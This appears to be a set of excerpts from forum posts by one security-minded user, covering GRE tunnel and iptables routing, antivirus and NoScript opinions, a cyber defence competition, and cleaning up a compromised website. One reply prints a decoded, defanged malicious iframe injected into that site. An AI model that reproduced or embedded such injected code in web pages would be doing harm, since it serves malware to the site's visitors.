Looks like spaces aren't respected:
GRE-->iptables-->server
^ Entry here ends at iptables
......^ Entry here correctly ends at server
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I have a server that is is behind a GRE tunnel. This much works. I can get to the server with the GRE tunnel. What doesn't work is then a masquerade setup that works without the gre tunnel.
So this is what things look like:
GRE-->iptables-->server
^ Entry here ends at iptables
^ Entry...
Glad you got it worked out. You'll probably have to contact Google (or perhaps it'd be better coming from your host since your site wasn't the only one affected) to get them to remove the suspicious listing.
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It might be a good idea to take the site down ... Google has already picked it up as a malware site.
I took the liberty of decoding the JavaScript for you.
<iframe width="480" height="60" src="hxxp://tr aff ics-inspector.cn/daily_ stats/i n.cg i?3" style="border:0px; position:relative...
Incidentally, if it is actually printers that it is hitting, I'd recommend closing up the port from external access. Bad Things Can Happen(tm).
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While two-factor is better, I have my own concerns with the dongle. What happens if it shorts out? I remember years ago at a softball game, a guy had his electronic key in his pocket. After several hours of fun in the sun, the key shorted out. It was keyless entry, meaning there wasn't a...
I'm partial to McAfee right now. I used the Enterprise version a couple of years ago and really liked it. It is a bit resource intensive, but it also seemed to work better than some of the others at the time, like Norton. The place that I worked with had a lot of problems with Norton and it not...
I'll have to disagree on AVG. I used to have it and it never found anything, including programs that I knew were there. Several of my friends have said the same thing. We are all in the information security field, so we have software that isn't considered kosher, such as netcat. I typically have...
It'll give you a yellow bar to click at the bottom of your browser to allow sites. Since it is a whitelist, setting it up at first can be a little annoy, but once you do, you'll be glad you did.
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Thanks guys. :) Sadly I don't have time to wait 6 six weeks as the competition is the 17th. We got our packets a week ago. Gotta love how they give you all this time to prepare. :P
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Yeah, I know it is old, but I don't have a choice in the matter. Let me explain.
I'm participating in a cyber security competition, and we have a Windows 2000 server to defend that runs an Exchange server. Obviously it can't run 2007, so it has to run 2003. To practice and prepare, we are...
I have need of getting my hands on a copy of Exchange 2003 trial. A search of Microsoft.com shows that it is really hard to find a copy. http://www.microsoft.com/australia/windowsserversystem/products/exchange/evaluate.mspx comes up in Google, but the download link is dead...
We have cookies too.
:D
Cryptography is a fascinating subject, isn't it? There is just so much to security, it is hard (for me at least) to be content with just one subject area.
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I forgot to mention that NoScript by default covers clickjacking for both disallowed and allowed sites.
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I have to disagree there. Malware affects everybody on the company network, not just that person. Visiting questionable sites is one of the best ways to get infected, though with the proliferation of compromised adservers and websites, not the only way. Visiting even company-sanctioned websites...
Google: php ical library
Google: php icalendar
That should get you started. :)
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